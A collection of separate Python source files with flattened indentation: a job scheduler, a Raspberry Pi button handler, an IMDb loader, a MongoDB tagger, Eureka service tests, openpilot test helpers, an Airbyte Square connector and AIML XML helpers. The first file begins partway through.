if not next_job.is_paused() and self.current_job != next_job:
if self.sleeper:
self.sleeper.cancel()
wait_time = (next_job.next_run_time - now()).total_seconds()
self.sleeper = Timer(wait_time, self._execute_job)
self.sleeper.start()
self.current_job = next_job
self.running = True
def _execute_job(self):
"""
Takes the currently scheduled job and starts it in it's own thread or just executes it if it is set to run
concurrently. Then it trims, sorts and sets up the next job for execution.
"""
if self.current_job:
if not self.current_job.is_paused():
if self.current_job.threaded:
self.current_job.thread = self.current_job.run(self.current_job.retrys)
else:
self.current_job.run(self.current_job.retrys)
self.current_job = None
if self.running:
self._trim_jobs()
self._sort_jobs()
self._set_timer()
def _sort_jobs(self):
"""
Sorts the jobs by the least amount of time till the next execution time to the most if there is a
next_run_time at all
"""
if len(self.jobs) > 1:
self.jobs.sort(key=lambda job: job.next_run_time if job.next_run_time is not None else datetime.max)
def _trim_jobs(self):
"""
Finds any jobs that are not set to repeat and have at least executed once already to be removed from the list of jobs
"""
for job in self.jobs:
if not job.repeating and job.run_count > 0:
self.remove(job.name)
def add_job(self, job):
"""
Takes a Job object and adds it to the list of jobs, gives it a name if it doesn't have one, sorts jobs and
then sets up the next job for execution. Returns the job name for easy referencing to it later.
"""
if job.name is None:
job.name = 'Job{}'.format(len(self.jobs) + 1)
job.parent = self
self.jobs.append(job)
self._sort_jobs()
self._set_timer()
return job.name
def schedule_job(self, job_type, when, args=None, kwargs=None, name=None, repeating=True, threaded=True,
ignore_exceptions=False, retrys=0, retry_time=0, alt_func=None, start_time=None, interval=None,
custom_format=None):
"""
A function wrapper to be used as a decorator to schedule jobs with
"""
def inner(func):
self.add_job(job_type(func=func, when=when, args=args, kwargs=kwargs, name=name, repeating=repeating,
threaded=threaded, ignore_exceptions=ignore_exceptions, retrys=retrys, retry_time=retry_time,
alt_func=alt_func, start_time=start_time, interval=interval, custom_format=custom_format))
return func
return inner
def get_job(self, name):
"""
Finds and returns the Job object that matched the name provided
"""
return self.jobs[self.find_job_index(name)]
def reset(self):
"""
Resets the Scheduler status by clearing the current job,
stopping the Timer, sorting the jobs and setting the next Timer
"""
self.running = True
self.current_job = None
if self.sleeper:
self.sleeper.cancel()
self.sleeper = None
self._sort_jobs()
self._set_timer()
def remove(self, name):
"""
Finds and removes the Job object that matched the name provided
"""
idx = self.find_job_index(name)
job = self.jobs[idx]
del self.jobs[idx]
if self.current_job == job:
self.reset()
def pop(self, name):
"""
Finds and removes the Job object that matched the name provided and returns it
"""
idx = self.find_job_index(name)
if self.current_job == self.jobs[idx]:
self.reset()
return self.jobs.pop(idx)
def job_names(self):
"""
Returns a list of the names for the jobs in the scheduler
"""
return [job.name for job in self.jobs]
def find_job_index(self, name):
"""
Finds the index of the job that matches the name provided from the list of Job objects
"""
for x, job in enumerate(self.jobs):
if job.name == name:
return x
def next_run_times(self):
"""
Returns a dictionary of the list of Job objects with the name as the key and the next run time as the item
"""
return {job.name: job.next_run_time for job in self.jobs}
def start_all(self):
"""
Starts all the jobs if any of them happened to be paused if it isn't already running
"""
for job in self.jobs:
if not job.is_running():
job.start()
self.reset()
def stop_scheduler(self):
"""
Stops the scheduler from executing any jobs
"""
self.running = False
self.current_job = None
if self.sleeper:
self.sleeper.cancel()
self.sleeper = None
def pause_all(self, cancel_current=False):
"""
Pauses all the jobs currently in the scheduler with the option
to cancel the Timer for the currently scheduled job
"""
for job in reversed(self.jobs):
job.pause()
if cancel_current:
self.reset()
def start_web_server(self, pre_existing_server=False, p=port):
"""
Allows for the starting of a CherryPy web application for the viewing and management of scheduled jobs.
Requires that the user has the module CherryPy installed on their system
"""
global port
try:
# noinspection PyUnresolvedReferences
import cherrypy
start_web_interface(self)
if not pre_existing_server:
cherrypy.config.update({'server.socket_port': p})
cherrypy.engine.start()
print('Started the Pyriodic web interface at http://localhost:{}/pyriodic'.format(p))
port += 1 # increments so multiple schedulers can be instantiated and display their own jobs page
except ImportError:
raise ImportError('The web interface requires that CherryPy be installed')
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
## Copyright 2018 KYOHRITSU ELECTRONIC INDUSTRY CO., LTD.
##
## Permission is hereby granted, free of charge, to any person obtaining a copy
## of this software and associated documentation files (the "Software"), to
## deal in the Software without restriction, including without limitation the
## rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
## sell copies of the Software, and to permit persons to whom the Software is
## furnished to do so, subject to the following conditions:
##
## The above copyright notice and this permission notice shall be included in
## all copies or substantial portions of the Software.
##
## THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
## IN THE SOFTWARE.
import sys
import signal
from subprocess import Popen, call
from time import sleep
from rscsp.onboard import onboard
# オンエッジ検出で起動するコマンド
COMMAND_ON_RELEASE = ('. env/bin/activate && '
'googlesamples-assistant-hotword --device_model_id my_rpi1')
PRECOMMAND_ON_RELEASE = 'pkill -f "googlesamples-assistant-hotword"'
# 長押し検出で起動するコマンド
COMMAND_ON_HOLD = 'sudo shutdown -h now'
# 長押し認識時間 (秒)
SW_HOLD_THRESHOLD_SECONDS = 5.0
def signal_handler(signum, frame):
"""各シグナル受信によるプログラムの終了処理"""
print('Quit on SIGNAL %d...' % signum, file=sys.stderr)
onboard.clean()
sys.exit(0)
if __name__ == '__main__':
# SIGTERM受信時の実行関数を登録
signal.signal(signal.SIGTERM, signal_handler)
# ステータスLEDを使用開始し、点灯
onboard.status.use(1)
# 押しボタンスイッチを使用開始
onboard.pushsw.use()
# オフエッジ、長押し検出でそれぞれコマンドを実行
try:
while True:
# スイッチ入力の取得
onboard.pushsw.capture()
# オフエッジ検出を確認
if onboard.pushsw.off_edge():
call(PRECOMMAND_ON_RELEASE, shell=True)
Popen(COMMAND_ON_RELEASE, shell=True)
# 長押し検出を確認
if onboard.pushsw.hold_time() >= SW_HOLD_THRESHOLD_SECONDS:
Popen(COMMAND_ON_HOLD, shell=True)
break
# 一定時間待機
sleep(0.02)
# Ctrl+C の入力でループから脱出
except KeyboardInterrupt:
print('Quit...')
# 後始末をして終了
onboard.clean()
sys.exit(0)
|
# -*- coding: utf-8 -*
import urllib
import re
import os
import json
from imdbpie import Imdb
from datetime import datetime
class Movie():
"""Movie object storing detailed information and related media links
Parameters
----------
title
Movie title
storyline
A short excerpt of the moviews Storyline
poster_image_url
Covershot URL
trailer_youtube_url
Youtube URL of the trailer
genre : list
List of genres
"""
__api_key = ""
__movies = []
def __init__(self, title, storyline, image, trailer_url, genre, released):
self.title = title
self.storyline = storyline
self.poster_image_url = image
self.trailer_youtube_url = trailer_url
self.genre = genre
self.released = released
self.release_year = datetime.strptime(released, '%Y-%m-%d').year
@staticmethod
def set_api_key(api_key):
"""Sets the private property __api_key to allow information retrieval from the selected inofficial IMDb REST API"""
Movie.__api_key = api_key
@staticmethod
def validate_imdb(fragment):
"""Validates the passed parameter against the typical IMDb ID pattern"""
return re.match('tt[0-9]{7}$',fragment)
@staticmethod
def validate_youtube(fragment):
"""Validates the passed parameter against by retrieving the HTTP response code assuming 200 means it is valid.
@return bool
"""
request=urllib.urlopen('https://www.youtube.com/watch?v=' + fragment)
return request.getcode() == 200
@staticmethod
def imdb_load_file(file_name):
"""Loads a stored JSON file according for the given filename from the subfolder imdb."""
imdb_saved = open(file_name)
imdb_save = json.loads(imdb_saved.read())
Movie.__movies.append(
Movie(
imdb_save['title'],
imdb_save['description'],
imdb_save['image'],
"https://www.youtube.com/watch?v=" + imdb_save['youtube_id'],
imdb_save['genres'],
imdb_save['released']
)
)
@staticmethod
def imdb_load():
"""Loads all JSON files from the subfolder imdb and calls imdb_load_file respectively.
@return list
"""
for root, dirs, filenames in os.walk(os.path.dirname(__file__) + "/imdb"):
for file_name in filenames:
if file_name.find(".json") > 0:
Movie.imdb_load_file(os.path.dirname(__file__) + "/imdb/" + file_name)
return Movie.__movies
@staticmethod
def add_from_imdb(imdb_id, youtube_id):
"""Retrieves movie data from the inofficial IMDb REST API as well as the IMDB lib imdbpie."""
file_name = os.path.dirname(__file__) + "/imdb/" + imdb_id + ".json"
if not os.path.isdir(os.path.dirname(file_name)):
os.mkdir(os.path.dirname(file_name))
if os.path.isfile(file_name):
imdb_saved = open(file_name)
imdb_save = json.loads(imdb_saved.read())
else:
response = urllib.urlopen('http://imdb.wemakesites.net/api/' + imdb_id + '?api_key=' + Movie.__api_key)
json_response = response.read()
imdb_data = json.loads(json_response)
imdb_save = imdb_data['data']
imdb = Imdb()
imdb = Imdb(anonymize=True) # to proxy requests
movie = imdb.get_title_by_id(imdb_id)
if not movie.title:
movie.title = raw_input("Movie Title not defined. Please set: ")
imdb_save['rating'] = movie.rating
imdb_save['title'] = movie.title
if youtube_id:
imdb_save['youtube_id'] = youtube_id
imdb_file = open(file_name, 'w')
imdb_file.write(json.dumps(imdb_save))
imdb_file.close()
|
#!/usr/bin/env python3
from housepy import config, log, util, strings
from mongo import db
def main():
log.info("core_tagger...")
t = util.timestamp()
features = db.features.find({'properties.Expedition': config['expedition'], 'properties.CoreExpedition': {'$exists': False}})
for feature in features:
if t - feature['properties']['t_utc'] > 60 * 60 * 48: ## after 48 hours, don't worry about it
continue
log.info("Updating feature %s" % feature['_id'])
if 'Member' not in feature['properties']:
log.warning("--> no member, feature_type is %s" % feature['properties']['FeatureType'])
continue
member = feature['properties']['Member']
if member is None:
core_sat = config['satellites'][0]
if 'Satellite' in feature['properties']:
core = feature['properties']['Satellite'] == core_sat
log.info("--> satellite, core is %s" % core)
else:
log.info("--> null Member, core is True")
core = True
else:
t = feature['properties']['t_utc']
try:
core = list(db.members.find({'Name': member, 't_utc': {'$lte': t}}).sort('t_utc', -1).limit(1))[0]['Core']
log.info("--> core is %s" % core)
except Exception as e:
log.info("--> no core entry at time %s" % t)
continue
db.features.update({'_id': feature['_id']}, {'$set': {'properties.CoreExpedition': core}})
log.info("--> updated feature, CoreExpedition: %s" % core)
main()
|
from typing import List
from morpho.error import NoWorkerFunctionError
from morpho.rest.models import TransformDocumentRequest
import httpretty
from pydantic.main import BaseModel
import pytest
from morpho.config import ServiceConfig
from morpho.consumer import RestGatewayConsumer, RestGatewayServiceConfig, WorkConsumer
from morpho.types import Worker
from tests.unit.eureka_mock_data import (
EUREKA_GET_APPS_RESPONSE_CAESER_PERMUTATION_VIGENERE,
EUREKA_GET_APPS_RESPONSE_ONLY_CAESER,
EUREKA_GET_APPS_RESPONSE_CAESER_PERMUATION_CRYPTOxGW,
EUREKA_GET_APPS_RESPONSE_ECHO_COUNT_CRYPTOxGW,
)
class MockConsumer(WorkConsumer):
def start(self) -> None:
pass
@pytest.fixture
def consumer():
yield MockConsumer(work=None, config=ServiceConfig(name="ECHO"), options_type=None)
@pytest.fixture
def consumer_eureka():
yield MockConsumer(
work=None, config=ServiceConfig(name="CAESER", register=True), options_type=None
)
def test_list_services_no_eureka(consumer: MockConsumer):
list_service_response = consumer.list_services()
assert len(list_service_response.services) == 1
assert list_service_response.services[0].name == "ECHO"
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_three_apps(consumer_eureka: MockConsumer):
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_CAESER_PERMUTATION_VIGENERE,
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50000/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50001/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/options",
body="{}",
status=200,
)
list_services_response = consumer_eureka.list_services()
# FIXME: maybe bad because what if the order changes?
# the test should not care in which order they are received
assert len(list_services_response.services) == 3
assert list_services_response.services[0].name == "CAESER"
assert list_services_response.services[0].options == {}
assert list_services_response.services[1].name == "PERMUTATION"
assert list_services_response.services[1].options == {}
assert list_services_response.services[2].name == "VIGENERE"
assert list_services_response.services[2].options == {}
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_no_other_apps(consumer_eureka: MockConsumer):
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_ONLY_CAESER,
status=200,
)
list_services_response = consumer_eureka.list_services()
assert len(list_services_response.services) == 1
assert list_services_response.services[0].name == "CAESER"
assert list_services_response.services[0].options == {}
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_two_other_apps_and_one_gateway(
consumer_eureka: MockConsumer,
):
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_CAESER_PERMUATION_CRYPTOxGW,
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50000/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50001/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/list",
body="""{"services": [
{"name": "CAESER", "options": {}},
{"name": "PERMUTATION", "options": {}},
{"name": "CRYPTO.GW", "options": {}},
{"name": "CRYPTO.CRYPTOSIE", "options": {}}
]}""",
status=200,
)
list_services_response = consumer_eureka.list_services()
assert len(list_services_response.services) == 4
assert list_services_response.services[0].name == "CAESER"
assert list_services_response.services[0].options == {}
assert list_services_response.services[1].name == "PERMUTATION"
assert list_services_response.services[1].options == {}
assert list_services_response.services[2].name == "CRYPTO.GW"
assert list_services_response.services[2].options == {}
assert list_services_response.services[3].name == "CRYPTO.CRYPTOSIE"
assert list_services_response.services[3].options == {}
@httpretty.activate(allow_net_connect=False)
def test_list_services_with_eureka_and_two_other_apps_and_one_gateway_resolver():
httpretty.register_uri(
httpretty.GET,
"http://localhost:8761/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_ECHO_COUNT_CRYPTOxGW,
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:8762/eureka/apps/",
body=EUREKA_GET_APPS_RESPONSE_CAESER_PERMUTATION_VIGENERE,
status=200,
)
# CEASER PERMUTATION VEVENERE
httpretty.register_uri(
httpretty.GET,
"http://localhost:50000/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50001/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50002/v1/service/options",
body="{}",
status=200,
)
# ECHO COUNT
httpretty.register_uri(
httpretty.GET,
"http://localhost:50010/v1/service/options",
body="{}",
status=200,
)
httpretty.register_uri(
httpretty.GET,
"http://localhost:50011/v1/service/options",
body="{}",
status=200,
)
mock_rest_gateway_consumer = RestGatewayConsumer(
work=None,
config=RestGatewayServiceConfig(
name="CRYPTO.GW",
register=True,
registrar_url="http://localhost:8761/eureka",
resolver_url="http://localhost:8762/eureka",
),
options_type=None,
)
list_service_response = mock_rest_gateway_consumer.list_services()
assert len(list_service_response.services) == 6
assert list_service_response.services[0].name == "CRYPTO.GW"
assert list_service_response.services[0].options == {}
assert list_service_response.services[1].name == "ECHO"
assert list_service_response.services[1].options == {}
assert list_service_response.services[2].name == "COUNT"
assert list_service_response.services[2].options == {}
assert list_service_response.services[3].name == "CRYPTO.CAESER"
assert list_service_response.services[3].options == {}
assert list_service_response.services[4].name == "CRYPTO.PERMUTATION"
assert list_service_response.services[4].options == {}
assert list_service_response.services[5].name == "CRYPTO.VIGENERE"
assert list_service_response.services[5].options == {}
def test_options_no_options(consumer: MockConsumer):
result = consumer.options()
assert result == {}
def test_options_with_options():
class Options(BaseModel):
offset: int = 0
consumer = MockConsumer(
work=None,
config=ServiceConfig(name="CAESER", options=Options),
options_type=Options,
)
result = consumer.options()
assert result == {
"title": "Options",
"type": "object",
"properties": {"offset": {"title": "Offset", "default": 0, "type": "integer"}},
}
def test_transform_document_no_worker(consumer: MockConsumer):
request = TransformDocumentRequest(document="Hello World!", service_name="CAESER")
with pytest.raises(NoWorkerFunctionError, match="No worker function specified!"):
consumer.transform_document(request=request)
def mock_echo_worker(document: str):
return document
def mock_append_worker(document: str):
return "Appended" + document
def mock_echo_print_output_worker(document: str):
print("transforming...")
return document
@pytest.mark.parametrize(
"worker_function,document,expected_document,expected_output",
[
(mock_echo_worker, "Document!", "Document!", []),
(mock_append_worker, "Document", "AppendedDocument", []),
(mock_echo_print_output_worker, "Doc", "Doc", ["transforming..."]),
],
)
def test_transform_document_with_worker(
worker_function: Worker,
document: str,
expected_document: str,
expected_output: List[str],
):
consumer = MockConsumer(
work=worker_function, config=ServiceConfig(name="ECHO"), options_type=None
)
request = TransformDocumentRequest(document=document, service_name="ECHO")
result = consumer.transform_document(request=request)
assert result.document == expected_document
assert result.output == expected_output
assert result.error == []
|
import time
from functools import wraps
from nose.tools import nottest
from selfdrive.hardware import PC
from selfdrive.version import training_version, terms_version
from selfdrive.manager.process_config import managed_processes
def set_params_enabled():
from common.params import Params
params = Params()
params.put("HasAcceptedTerms", terms_version)
params.put("CompletedTrainingVersion", training_version)
params.put_bool("OpenpilotEnabledToggle", True)
params.put_bool("CommunityFeaturesToggle", True)
params.put_bool("Passive", False)
def phone_only(x):
if PC:
return nottest(x)
else:
return x
def with_processes(processes, init_time=0, ignore_stopped=None):
ignore_stopped = [] if ignore_stopped is None else ignore_stopped
def wrapper(func):
@wraps(func)
def wrap(*args, **kwargs):
# start and assert started
for n, p in enumerate(processes):
managed_processes[p].start()
if n < len(processes) - 1:
time.sleep(init_time)
assert all(managed_processes[name].proc.exitcode is None for name in processes)
# call the function
try:
func(*args, **kwargs)
# assert processes are still started
assert all(managed_processes[name].proc.exitcode is None for name in processes if name not in ignore_stopped)
finally:
for p in processes:
managed_processes[p].stop()
return wrap
return wrapper
|
#
# Copyright (c) 2021 Airbyte, Inc., all rights reserved.
#
import json
from abc import ABC, abstractmethod
from typing import Any, Iterable, List, Mapping, MutableMapping, Optional, Tuple
import pendulum
import requests
from airbyte_cdk.models import SyncMode
from airbyte_cdk.sources import AbstractSource
from airbyte_cdk.sources.streams import Stream
from airbyte_cdk.sources.streams.http import HttpStream
from airbyte_cdk.sources.streams.http.auth import TokenAuthenticator
from source_square.utils import separate_items_by_count
class SquareException(Exception):
""" Just for formatting the exception as Square"""
def __init__(self, status_code, errors):
self.status_code = status_code
self.errors = errors
def __str__(self):
return f"Code: {self.status_code}, Detail: {self.errors}"
def parse_square_error_response(error: requests.exceptions.HTTPError) -> SquareException:
if error.response.content:
content = json.loads(error.response.content.decode())
if content and "errors" in content:
return SquareException(error.response.status_code, content["errors"])
class SquareStream(HttpStream, ABC):
def __init__(self, is_sandbox: bool, api_version: str, start_date: str, include_deleted_objects: bool, **kwargs):
super().__init__(**kwargs)
self.is_sandbox = is_sandbox
self.api_version = api_version
# Converting users ISO 8601 format (YYYY-MM-DD) to RFC 3339 (2021-06-14T13:47:56.799Z)
# Because this standard is used by square in 'updated_at' records field
self.start_date = pendulum.parse(start_date).to_rfc3339_string()
self.include_deleted_objects = include_deleted_objects
data_field = None
primary_key = "id"
items_per_page_limit = 100
@property
def url_base(self) -> str:
return "https://connect.squareup{}.com/v2/".format("sandbox" if self.is_sandbox else "")
def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]:
next_page_cursor = response.json().get("cursor", False)
if next_page_cursor:
return {"cursor": next_page_cursor}
def request_headers(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Mapping[str, Any]:
return {"Square-Version": self.api_version, "Content-Type": "application/json"}
def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]:
json_response = response.json()
records = json_response.get(self.data_field, []) if self.data_field is not None else json_response
yield from records
def _send_request(self, request: requests.PreparedRequest, request_kwargs: Mapping[str, Any]) -> requests.Response:
try:
return super()._send_request(request, request_kwargs)
except requests.exceptions.HTTPError as e:
square_exception = parse_square_error_response(e)
if square_exception:
self.logger.error(str(square_exception))
raise e
# Some streams require next_page_token in request query parameters (TeamMemberWages, Customers)
# but others in JSON payload (Items, Discounts, Orders, etc)
# That's why this 2 classes SquareStreamPageParam and SquareStreamPageJson are made
class SquareStreamPageParam(SquareStream, ABC):
def request_params(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> MutableMapping[str, Any]:
return {"cursor": next_page_token["cursor"]} if next_page_token else {}
class SquareStreamPageJson(SquareStream, ABC):
def request_body_json(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Optional[Mapping]:
return {"cursor": next_page_token["cursor"]} if next_page_token else {}
class SquareStreamPageJsonAndLimit(SquareStreamPageJson, ABC):
def request_body_json(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Optional[Mapping]:
json_payload = {"limit": self.items_per_page_limit}
if next_page_token:
json_payload.update(next_page_token)
return json_payload
class SquareCatalogObjectsStream(SquareStreamPageJson):
data_field = "objects"
http_method = "POST"
items_per_page_limit = 1000
def path(self, **kwargs) -> str:
return "catalog/search"
def request_body_json(
self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, Any] = None, next_page_token: Mapping[str, Any] = None
) -> Optional[Mapping]:
json_payload = super().request_body_json(stream_state, stream_slice, next_page_token)
if self.path() == "catalog/search":
json_payload["include_deleted_objects"] = self.include_deleted_objects
json_payload["include_related_objects"] = False
json_payload["limit"] = self.items_per_page_limit
return json_payload
class IncrementalSquareGenericStream(SquareStream, ABC):
def get_updated_state(self, current_stream_state: MutableMapping[str, Any], latest_record: Mapping[str, Any]) -> Mapping[str, Any]:
if current_stream_state is not None and self.cursor_field in current_stream_state:
return {self.cursor_field: max(current_stream_state[self.cursor_field], latest_record[self.cursor_field])}
else:
return {self.cursor_field: self.start_date}
class IncrementalSquareCatalogObjectsStream(SquareCatalogObjectsStream, IncrementalSquareGenericStream, ABC):
@property
@abstractmethod
def object_type(self):
"""Object type property"""
state_checkpoint_interval = SquareCatalogObjectsStream.items_per_page_limit
cursor_field = "updated_at"
def request_body_json(self, stream_state: Mapping[str, Any], **kwargs) -> Optional[Mapping]:
json_payload = super().request_body_json(stream_state, **kwargs)
if stream_state:
json_payload["begin_time"] = stream_state[self.cursor_field]
json_payload["object_types"] = [self.object_type]
return json_payload
class IncrementalSquareStream(IncrementalSquareGenericStream, SquareStreamPageParam, ABC):
state_checkpoint_interval = SquareStream.items_per_page_limit
cursor_field = "created_at"
def request_params(
self,
stream_state: Mapping[str, Any],
stream_slice: Mapping[str, Any] = None,
next_page_token: Mapping[str, Any] = None,
) -> MutableMapping[str, Any]:
params_payload = super().request_params(stream_state, stream_slice, next_page_token)
if stream_state:
params_payload["begin_time"] = stream_state[self.cursor_field]
params_payload["limit"] = self.items_per_page_limit
return params_payload
class Items(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = ITEM"""
object_type = "ITEM"
class Categories(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = CATEGORY"""
object_type = "CATEGORY"
class Discounts(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = DISCOUNT"""
object_type = "DISCOUNT"
class Taxes(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = TAX"""
object_type = "TAX"
class ModifierList(IncrementalSquareCatalogObjectsStream):
"""Docs: https://developer.squareup.com/explorer/square/catalog-api/search-catalog-objects
with object_types = MODIFIER_LIST"""
object_type = "MODIFIER_LIST"
class Refunds(IncrementalSquareStream):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/refunds-api/list-payment-refunds """
data_field = "refunds"
def path(self, **kwargs) -> str:
return "refunds"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload["sort_order"] = "ASC"
return params_payload
class Payments(IncrementalSquareStream):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/payments-api/list-payments """
data_field = "payments"
def path(self, **kwargs) -> str:
return "payments"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload["sort_order"] = "ASC"
return params_payload
class Locations(SquareStream):
""" Docs: https://developer.squareup.com/explorer/square/locations-api/list-locations """
data_field = "locations"
def path(self, **kwargs) -> str:
return "locations"
class Shifts(SquareStreamPageJsonAndLimit):
""" Docs: https://developer.squareup.com/reference/square/labor-api/search-shifts """
data_field = "shifts"
http_method = "POST"
items_per_page_limit = 200
def path(self, **kwargs) -> str:
return "labor/shifts/search"
class TeamMembers(SquareStreamPageJsonAndLimit):
""" Docs: https://developer.squareup.com/reference/square/team-api/search-team-members """
data_field = "team_members"
http_method = "POST"
def path(self, **kwargs) -> str:
return "team-members/search"
class TeamMemberWages(SquareStreamPageParam):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/labor-api/list-team-member-wages """
data_field = "team_member_wages"
items_per_page_limit = 200
def path(self, **kwargs) -> str:
return "labor/team-member-wages"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload = params_payload or {}
params_payload["limit"] = self.items_per_page_limit
return params_payload
# This stream is tricky because once in a while it returns 404 error 'Not Found for url'.
# Thus the retry strategy was implemented.
def should_retry(self, response: requests.Response) -> bool:
return response.status_code == 404 or super().should_retry(response)
def backoff_time(self, response: requests.Response) -> Optional[float]:
return 3
class Customers(SquareStreamPageParam):
""" Docs: https://developer.squareup.com/reference/square_2021-06-16/customers-api/list-customers """
data_field = "customers"
def path(self, **kwargs) -> str:
return "customers"
def request_params(self, **kwargs) -> MutableMapping[str, Any]:
params_payload = super().request_params(**kwargs)
params_payload = params_payload or {}
params_payload["sort_order"] = "ASC"
params_payload["sort_field"] = "CREATED_AT"
return params_payload
class Orders(SquareStreamPageJson):
""" Docs: https://developer.squareup.com/reference/square/orders-api/search-orders """
data_field = "orders"
http_method = "POST"
items_per_page_limit = 500
# There is a restriction in the documentation where only 10 locations can be send at one request
# https://developer.squareup.com/reference/square/orders-api/search-orders#request__property-location_ids
locations_per_requets = 10
def path(self, **kwargs) -> str:
return "orders/search"
def request_body_json(self, stream_slice: Mapping[str, Any] = None, **kwargs) -> Optional[Mapping]:
json_payload = super().request_body_json(stream_slice=stream_slice, **kwargs)
json_payload = json_payload or {}
if stream_slice:
json_payload.update(stream_slice)
json_payload["limit"] = self.items_per_page_limit
return json_payload
def stream_slices(self, **kwargs) -> Iterable[Optional[Mapping[str, Any]]]:
locations_stream = Locations(
authenticator=self.authenticator,
is_sandbox=self.is_sandbox,
api_version=self.api_version,
start_date=self.start_date,
include_deleted_objects=self.include_deleted_objects,
)
locations_records = locations_stream.read_records(sync_mode=SyncMode.full_refresh)
location_ids = [location["id"] for location in locations_records]
if not location_ids:
self.logger.error(
"No locations found. Orders cannot be extracted without locations. "
"Check https://developer.squareup.com/explorer/square/locations-api/list-locations"
)
yield from []
separated_locations = separate_items_by_count(location_ids, self.locations_per_requets)
for location in separated_locations:
yield {"location_ids": location}
class SourceSquare(AbstractSource):
api_version = "2021-06-16" # Latest Stable Release
def check_connection(self, logger, config) -> Tuple[bool, any]:
headers = {
"Square-Version": self.api_version,
"Authorization": "Bearer {}".format(config["api_key"]),
"Content-Type": "application/json",
}
url = "https://connect.squareup{}.com/v2/catalog/info".format("sandbox" if config["is_sandbox"] else "")
try:
session = requests.get(url, headers=headers)
session.raise_for_status()
return True, None
except requests.exceptions.RequestException as e:
square_exception = parse_square_error_response(e)
if square_exception:
return False, square_exception.errors[0]["detail"]
return False, e
def streams(self, config: Mapping[str, Any]) -> List[Stream]:
auth = TokenAuthenticator(token=config["api_key"])
args = {
"authenticator": auth,
"is_sandbox": config["is_sandbox"],
"api_version": self.api_version,
"start_date": config["start_date"],
"include_deleted_objects": config["include_deleted_objects"],
}
return [
Items(**args),
Categories(**args),
Discounts(**args),
Taxes(**args),
Locations(**args),
TeamMembers(**args),
TeamMemberWages(**args),
Refunds(**args),
Payments(**args),
Customers(**args),
ModifierList(**args),
Shifts(**args),
Orders(**args),
]
|
from enum import Enum
class KnowledgeBaseFormatException(Exception):
pass
class KnowledgeBaseFormat(Enum):
MODELS = 1
KEYS = 2
|
from xml.etree.ElementTree import Element, SubElement,ElementTree, tostring
import xml.etree.ElementTree as ET
from xml.dom.minidom import parseString
import sys, re
def prettify(elem):
"""Return a pretty-printed XML string for the Element.
"""
rough_string = tostring(elem, 'utf-8')
reparsed = parseString(rough_string)
return reparsed.toprettyxml(indent="\t")
def writetofile(aiml, name):
n = name + '.aiml'
final = open(n, 'w')
final.write(aiml)
final.close()
#final = ET.ElementTree(aiml)
#final.write(n, encoding='utf-8', xml_declaration=True)
def createAIML(topics):
aiml = Element('aiml')
aiml.set('encoding', 'utf-8')
aiml.set('version', '1.0.1')
for topic in topics:
aiml.append(topic)
return aiml
def changeTopic(name):
think = Element('think')
setname = Element('set')
setname.set('name', 'topic')
setname.text = name
think.append(setname)
